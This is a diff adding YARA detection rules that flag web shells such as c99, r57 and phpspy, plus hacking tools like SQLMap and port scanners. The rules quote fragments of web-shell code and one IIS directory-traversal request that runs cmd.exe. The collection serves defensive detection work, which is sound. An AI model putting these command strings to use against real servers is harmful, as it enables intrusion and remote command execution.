+      $s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+      $s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?" 
+      $s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+      $s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_queryDong_spyjsp2010_zend_RID343F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:22:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "8b457934da3821ba58b06a113e0d53d9"
+      hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "return new Double(format.format(value)).doubleValue();" fullword
+      $s5 = "File tempF = new File(savePath);" fullword
+      $s9 = "if (tempF.isDirectory()) {" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99_c99shell_2_RID2F58 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:53:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+      hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+      hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "$bindport_pass = \"c99\";" fullword
+      $s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_r57shell_antichat_RID3147 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:15:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+      hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+      hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d" 
+      $s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+      $s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+      $s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx_RID360A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 16:38:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4745d510fed4378e4b1730f56f25e569"
+      hash2 = "f3ca29b7999643507081caab926e2e74"
+      hash3 = "46a18979750fa458a04343cf58faa9bd"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "BODY, TD, TR {" fullword
+      $s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+      $s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_css_dm_he1p_xxx_RID30B3 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:51:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+      hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+      $s4 = "URL downUrl = new URL(downFileUrl);" fullword
+      $s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+      $s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+      $s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+      $s8 = "URLConnection conn = downUrl.openConnection();" fullword
+      $s9 = "sis = request.getInputStream();" fullword
+   condition: 
+      4 of them
+}
+
+rule Webshell_JSP_icesword_RID2F52 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:52:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+      hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+      hash3 = "56c005690da2558690c4aa305a31ad37"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+      $s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+      $s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_JFolder_JSP_2_RID2F29 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:45:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+      hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+      hash3 = "8979594423b68489024447474d113894"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol" 
+      $s2 = " KB </td>" fullword
+      $s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"" 
+      $s4 = "<!-- <tr align=\"center\"> " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_phpspy_2006_PHPSPY_RID30B4 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:51:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+      hash2 = "40a1f840111996ff7200d18968e42cfe"
+      hash3 = "0712e3dc262b4e1f98ed25760b206836"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "http://www.4ngel.net" fullword
+      $s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+      $s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+      $s9 = "Codz by Angel" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99_locus7s_c99_w4cking_xxx_RID34BB : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:43:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c34adbc8fd8d908cbb341734830f971"
+      hash2 = "ef43fef943e9df90ddb6257950b3538f"
+      hash3 = "ae025c886fbe7f9ed159f49593674832"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$res = @shell_exec($cfe);" fullword
+      $s8 = "$res = @ob_get_contents();" fullword
+      $s9 = "@exec($cfe,$res);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_browser_201_3_ma_ma2_download_RID3571 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 16:13:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+      hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+      hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+      $s2 = "private static String tempdir = \".\";" fullword
+      $s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\"" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_000_403_c5_queryDong_spyjsp2010_RID350B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:56:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "8b457934da3821ba58b06a113e0d53d9"
+      hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val" 
+      $s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa" 
+      $s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName(" 
+      $s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_r57shell127_r57_kartal_r57_RID338E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:52:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+      hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+      $s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+      $s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_" 
+   condition: 
+      2 of them
+}
+
+rule HKTL_Fierce2_RID2B23 : DEMO HKTL {
+   meta:
+      description = "This signature detects the Fierce2 domain scanner"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 08:53:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars," 
+   condition: 
+      1 of them
+}
+
+rule HKTL_Ncrack_RID2AF5 : DEMO HKTL T1110 {
+   meta:
+      description = "This signature detects the Ncrack brute force tool"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 09:40:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1110"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via" 
+   condition: 
+      1 of them
+}
+
+rule HKTL_SQLMap_RID2AB1 : DEMO HKTL {
+   meta:
+      description = "This signature detects the SQLMap SQL injection tool"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 07:46:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "except SqlmapBaseException, ex:" 
+   condition: 
+      1 of them
+}
+
+rule HKTL_PortScanner_RID2D12 : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file PortScanner.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 10:16:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Scan Ports Every" 
+      $s3 = "Scan All Possible Ports!" 
+   condition: 
+      all of them
+}
+
+rule HKTL_MooreR_Port_Scanner_RID3024 : DEMO HKTL T1046 {
+   meta:
+      description = "Semiautomatically generated YARA rule on file MooreR Port Scanner.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 12:27:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1046"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Description|" 
+      $s3 = "soft Visual Studio\\VB9yp" 
+      $s4 = "adj_fptan?4" 
+      $s7 = "DOWS\\SyMem32\\/o" 
+   condition: 
+      all of them
+}
+
+rule HKTL_NetBIOS_Name_Scanner_RID3000 : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file NetBIOS Name Scanner.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 12:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "IconEx" 
+      $s2 = "soft Visual Stu" 
+      $s4 = "NBTScanner!y&" 
+   condition: 
+      all of them
+}
+
+rule HKTL_FeliksPack3___Scanners_ipscan_RID33EA : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file ipscan.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 15:08:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "WCAP;}ECTED" 
+      $s4 = "NotSupported" 
+      $s6 = "SCAN.VERSION{_" 
+   condition: 
+      all of them
+}
+
+rule HKTL_CGISscan_CGIScan_RID2E25 : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file CGIScan.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 11:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Wang Products" fullword wide
+      $s2 = "WSocketResolveHost: Cannot convert host address '%s'" 
+      $s3 = "tcp is the only protocol supported thru socks server" 
+   condition: 
+      all of ( $s* )
+}
+
+rule HKTL_IP_Stealing_Utilities_RID30ED : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file IP Stealing Utilities.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 13:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "DarkKnight" 
+      $s9 = "IPStealerUtilities" 
+   condition: 
+      all of them
+}
+
+rule HKTL_PortRacer_RID2C35 : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file PortRacer.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 09:39:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Auto Scroll BOTH Text Boxes" 
+      $s4 = "Start/Stop Portscanning" 
+      $s6 = "Auto Save LogFile by pressing STOP" 
+   condition: 
+      all of them
+}
+
+rule HKTL_scanarator_RID2CD1 : DEMO HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule on file scanarator.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-07 10:05:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
+   condition: 
+      all of them
+}
+
+/*
+    VALHALLA YARA RULE SET
+    Retrieved: 2023-01-27 02:55
+    Generated for User: demo
+    Number of Rules: 2368
+
+    This is the VALHALLA demo rule set. The content represents the 'signature-base' repository
+    in a streamlined format but lacks the rules provided by 3rd parties.
+    All rules are licensed under CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/.
+*/
\ No newline at end of file